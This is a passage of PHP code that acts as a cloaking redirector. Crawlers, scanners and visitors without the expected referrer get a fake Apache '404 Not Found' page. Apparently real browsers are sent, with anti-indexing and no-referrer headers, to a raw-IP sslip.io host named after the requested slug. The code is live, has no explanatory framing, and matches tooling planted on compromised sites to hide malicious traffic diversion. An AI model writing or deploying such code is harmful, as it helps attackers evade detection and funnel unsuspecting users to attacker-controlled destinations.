\n" . "\n" . "404 Not Found\n" . "\n" . "

Not Found

\n" . "

The requested URL was not found on this server.

\n" . "\n"; if (!headers_sent()) { if (function_exists('header_remove')) { header_remove(); } $protocol = 'HTTP/1.1'; if (isset($_SERVER['SERVER_PROTOCOL']) && ($_SERVER['SERVER_PROTOCOL'] === 'HTTP/1.0' || $_SERVER['SERVER_PROTOCOL'] === 'HTTP/1.1')) { $protocol = $_SERVER['SERVER_PROTOCOL']; } header($protocol . ' 404 Not Found', true, 404); header('Content-Type: text/html; charset=iso-8859-1', true); header('Content-Length: ' . strlen($body), true); } echo $body; exit; } if (!gp_is_real_browser()) gp_nf(); if (!gp_check_referer()) gp_nf(); $uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/'; $path = parse_url($uri, PHP_URL_PATH); if (!is_string($path)) { $path = ''; } $path = trim($path, '/'); if ($path === '' || $path === basename(__DIR__)) gp_nf(); $parts = explode('/', $path); $filtered = array(); for ($i = 0; $i < count($parts); $i++) { if ($parts[$i] !== '') { $filtered[] = $parts[$i]; } } if (count($filtered) < 1) gp_nf(); $slug = $filtered[count($filtered) - 1]; if (!preg_match('/^[A-Za-z0-9_-]{3,64}$/', $slug)) gp_nf(); $loc = 'https://origin.cdn.216.194.164.98.sslip.io/' . $slug; usleep(mt_rand(10000, 80000)); header('Location: ' . $loc, true, 302); header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0'); header('Pragma: no-cache'); header('Expires: 0'); header('X-Robots-Tag: noindex, nofollow, noarchive'); header('X-Content-Type-Options: nosniff'); header('Referrer-Policy: no-referrer'); exit;